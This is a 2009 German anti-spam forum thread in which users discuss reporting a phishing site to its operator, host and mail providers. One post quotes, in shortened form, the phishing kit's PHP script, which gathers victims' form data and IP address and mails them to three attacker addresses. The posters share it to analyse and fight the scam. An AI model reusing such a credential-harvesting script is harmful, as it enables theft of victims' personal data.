Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 11

Thema: Wie vorgehen?

  1. #1
    Mitglied
    Registriert seit
    15.01.2006
    Beiträge
    388

    Standard Wie vorgehen?

    Also diese Seite hat mir eine Phishingmail zugesandt. Ich hab gleich mal das richtige Directory reingepackt. Dort findet sich eine Datei paypal.zip (und das Unterdirectory paypal mit dem Phisher-Dreck).
    whois:http://adiflor.org/dyn_img/

    Betreiber ist informiert (Hoster nicht).

    Nun sind in dem Zip-File drei Mailadressen zu finden. An diese Werden die gephishten Daten wohl versandt.
    sabirano1@yahoo.com cruelston@gmail.com y2f@hotmail.com

    Ist es sinnvoll, yahoo, google und Mircosoft zu informieren? Wenn diese den Zugang zu dem Mailaccount löschen, dann ist die Phishingseite ungefährlich. Problem dabei: Solange dieses Zip-File existiert, ist der Hinweis auf den Abuse der Mailadressen beweisbar, aber gucken die dort auch rein? Wenn aber dieses Zipfile verschwindet, dann kollabiert die Beschwerde zu einer reinen Behauptung.

    Man müsste also *vorher* die Mailprovider anfixen und erst danach den Betreiber der Seite bzw. den Hoster. Vorteil wäre, dass möglicherweise noch weitere, bisher unbekannte Phisingseiten zumindest kurzzeitig down sind. Nachteil, dass diese eine bekannte Seite länger lebt und wohl einige Leute drauf reinfallen.

    Gibts da Erfahrungen?
    ←————————————————————→
    Will noch jemand bei Einstein@Home mitmachen?
    Das heise-Leser Team Special: Off-Topic bei Einstein@Home sucht immer Mitglieder! :)

  2. #2
    Mitglied Avatar von Chactory
    Registriert seit
    26.03.2006
    Ort
    Kiel (D)
    Beiträge
    913

    Standard

    Wie hat diese Seite denn das gemacht?
    Bitte mal einem, nun, interessierten Laien erklären!

  3. #3
    Forenbarbar Avatar von alariel
    Registriert seit
    02.03.2007
    Ort
    Hennef
    Beiträge
    3.434

    Standard

    Zitat Zitat von Wurgl Beitrag anzeigen
    Betreiber ist informiert (Hoster nicht).
    Wieviel Zeit hast Du dem denn gelassen? Ich denke, für gewöhnlich sollten 6-8h ausreichen. Nach Ablauf informiere ich den Hoster - ob der dann etwas unternimmt sei mal dahingestellt, mehr kann man jedoch nicht tun.

    Das mit den Mailadressen... ich denke nicht, dass das was bringt. Wer weiss, wer die wie und warum in das Zip gebastelt hat - beweisbar, dass die Daten dahin gehen, dürfte das Ganze nicht sein.

    @Chactory:
    Ich denke, er meinte, dass irgendein Zombie ihm eine Mail zugestellt hat, in der auf diese Seite verwiesen wurde...
    Klickibunti, zur Dunklen Seite dieser Weg Dich führt!
    Isediatur ignoratia vestra ac stupitiatae causa!
    Barbar - und stolz darauf!! ~***~ Nam et ipsa scientia potestas est!

  4. #4
    Mitglied Avatar von Chactory
    Registriert seit
    26.03.2006
    Ort
    Kiel (D)
    Beiträge
    913

    Standard

    Danke, Alariel!

  5. #5
    Medien- & Kaffeeguru Avatar von truelife
    Registriert seit
    28.01.2006
    Ort
    Vals (Graubünden)
    Beiträge
    18.643

    Standard

    EDIT: Thema verfehlt, setzen sechs! Ich habe gedacht, wie die Webseite angegebene Daten versenden kann...
    ___________________

    Ich versuche das mal ganz einfach zu erklären:

    Stell dir vor, du bist Kunde bei der Römerbank. Diese ist über die URL roemerbank.de erreichbar. Ein Phischer legt nun die Domain roemerbank.tippitapp.com an. Diese ist dann technisch gesehen eine ganz andere.

    Daraufhin verschickt er Mails, das du dein Konto aktualisieren musst und hierfür "hier klicken" musst. "hier klicken" führt nun aber zu roemerbank.tippitapp.com. Diese Seite sieht der deinigen absolut identisch.

    Via URL Cloaking oder Veränderungen an der hosts-Datei ist es sogar möglich, das du gar nicht an der URL siehst, das du nicht auf der echten Bankseite gelandet bist.

    Dort gibt es nun zwei Felder:

    PIN: _______

    TAN: _______

    und den Button "Absenden". Durch das Eintragen der Daten werden diese in eine Datenbank übertragen. Da kannst du dir der Einfachheit halber eine gefüllte Excel-Tabelle vorstellen. Ein Script z.B. hier für einen Formmailer: http://aktuell.de.selfhtml.org/artikel/php/form-mail/ verarbeiten die Daten dann weiter. So kannst du zB. eine Mailadresse angeben oder auch ein Archiv, in welchen Mailadressen liegen. Alles nur eine Frage der Scriptkenntnisse...
    Geändert von truelife (22.07.2009 um 14:26 Uhr) Grund: EDIT
    "Eine Rose wird auch im Himmel noch ein Rose sein, aber sie wird zehnmal süßer duften." - Luisa † 26.10.2009
    Spende an Antispam / Hilfe für Neulinge / Forenregeln / Nettiquette / Das Antispam - Lexikon / Werden Sie Mitglied
    "Das Internet ist für uns alle Neuland." - Bundeskanzlerin Angela Merkel (19.06.2013)
    smayer@public-files.de smayer@fantasymail.de

  6. #6
    Mitglied
    Registriert seit
    15.01.2006
    Beiträge
    388

    Standard

    Zitat Zitat von alariel Beitrag anzeigen
    Wieviel Zeit hast Du dem denn gelassen? Ich denke, für gewöhnlich sollten 6-8h ausreichen. Nach Ablauf informiere ich den Hoster - ob der dann etwas unternimmt sei mal dahingestellt, mehr kann man jedoch nicht tun.
    Nach 1 Stunde war das Phish-Zeugs weg. Das Zip existiert dort noch als .bak.

    Mit Hostern hab ich gute Erfahrungen. Bisher hat noch ein jeder reagiert, aber bisher waren das nur solche Seiten, wo eine Kontaktadresse auf der Seite selbst nicht zu finden war (die Mail-Adressen in whois ignorier ich ganz frech).
    ←————————————————————→
    Will noch jemand bei Einstein@Home mitmachen?
    Das heise-Leser Team Special: Off-Topic bei Einstein@Home sucht immer Mitglieder! :)

  7. #7
    Mitglied Avatar von Chactory
    Registriert seit
    26.03.2006
    Ort
    Kiel (D)
    Beiträge
    913

    Standard

    Trotzdem vielen Dank für Deine Mühe, Truelife!

  8. #8
    Mitglied
    Registriert seit
    15.01.2006
    Beiträge
    388

    Standard

    Eigentlich hab ich da schon was geschrieben, aber wohl nur auf Vorschau geklickt und nicht ins Forum ...

    <?php
    $ip = getenv("REMOTE_ADDR");
    $message .= "+----------------------- Deutschland ReZuLt-----------------+\n";
    ...
    $message .= "Vorname : ".$_POST['prenom']."\n";
    $message .= "Nachname : ".$_POST['nom']."\n";
    ...
    $message .= "-------------------------------------------------\n";
    $message .= "IP Address : ".$ip."\n";
    ...
    $message .= "-------------------+ Created in 2009 [ Cruel ] +--------------------\n";
    $cruel= "sabirano1@yahoo.com,cruelston@gmail.com,y2f@hotmail.com";
    $subject = "TEAM RABAT SALé CC DE 2009";
    mail($cruel,$subject,$message);
    header("Location: Continue.php");
    ?>
    Also es gibt hier eine Variable "message", in die wird eine lange Wurst von allen abgephishten Daten geschrieben. Ich hab dieses Zusammensetzen gekürzt und nur Vorname + Nachname (ja, das ist dort auf Deutsch) drinnen gelassen.

    Und dann geht es per php-Funktion "mail()" ab nach Phishhausen.

    Interessant ist, dass Phishi die IP-Adresse des Aufrufers mitschickt. Damit kann er sinnfreies Ausfüllen von falschen Daten recht schnell herausfiltern. Das bringt also genau gar nichts, es sei denn man verwendet für jeden Aufruf einen anderen (anonymen) Proxy.

    Witzig finde ich hier auch die deutschen Texte. Wenn man nach "TEAM RABAT SALé" googelt, dann findet man einige gehackte Seiten, die muslimische Kommentare zeigen. Nix gegen Muslime, aber der typische Deutsche ist kein Muslim. Daher ist die deutsche Sprache eine merkwürdige Kombination zu dieser Deppen^WHackergruppe.
    Geändert von Wurgl (22.07.2009 um 15:15 Uhr)
    ←————————————————————→
    Will noch jemand bei Einstein@Home mitmachen?
    Das heise-Leser Team Special: Off-Topic bei Einstein@Home sucht immer Mitglieder! :)

  9. #9
    Forenbarbar Avatar von alariel
    Registriert seit
    02.03.2007
    Ort
    Hennef
    Beiträge
    3.434

    Standard

    Ah, i see... im Script also

    Nun, dann würd' ich das mit entsprechenden Vermerken an die abuse-Adressen raushauen. Rausbekommen, ob $Mailprovider was tut wird man wohl nicht...
    Klickibunti, zur Dunklen Seite dieser Weg Dich führt!
    Isediatur ignoratia vestra ac stupitiatae causa!
    Barbar - und stolz darauf!! ~***~ Nam et ipsa scientia potestas est!

  10. #10
    Verbalakrobat Avatar von Goofy
    Registriert seit
    17.07.2005
    Ort
    Überall und nirgends
    Beiträge
    24.753

    Standard

    Könnte man so ein Skript nicht auch dazu verwenden, um den mit Fake-Eintragungen vollzumüllen? Das mit der IP könnte man ja umfunktionieren, so dass er z.B. irgendeine Random xxx.xxx.xxx.xxx kriegt.
    Goofy
    ______________________________
    Weisheiten des Trullius L. Guficus, 80 v.Chr.:
    "Luscinia, te pedem supplodere audio" - Nachtigall, ick hör dir trapsen
    "Vita praediolum eculeorum non est" - Das Leben ist kein Ponyhof
    "Avia mea in stabulo gallinario rotam automotam vehit" - Meine Oma fährt im Hühnerstall Motorrad
    "Sed illi, dicito: me in ano lambere potest" - Jenem aber, sag es ihm: er kann mich am Arsch lecken

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. Rechtlich gegen Spammer in Dtl. vorgehen?
    Von HALF im Forum 4.1 Vorbeuge gegen Spam
    Antworten: 13
    Letzter Beitrag: 12.07.2009, 11:52
  2. Erfolgreich gegen Spam vorgehen!
    Von M@rtini im Forum 1.1 deutschsprachig
    Antworten: 11
    Letzter Beitrag: 18.09.2006, 19:58
  3. wirksames vorgehen
    Von padreic im Forum 2.3 Telefon Spam
    Antworten: 3
    Letzter Beitrag: 06.04.2004, 09:14
  4. Richtiges Vorgehen gegen Dialer und Spam
    Von H_Lechle im Forum 4.1 Vorbeuge gegen Spam
    Antworten: 2
    Letzter Beitrag: 29.08.2002, 15:49

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen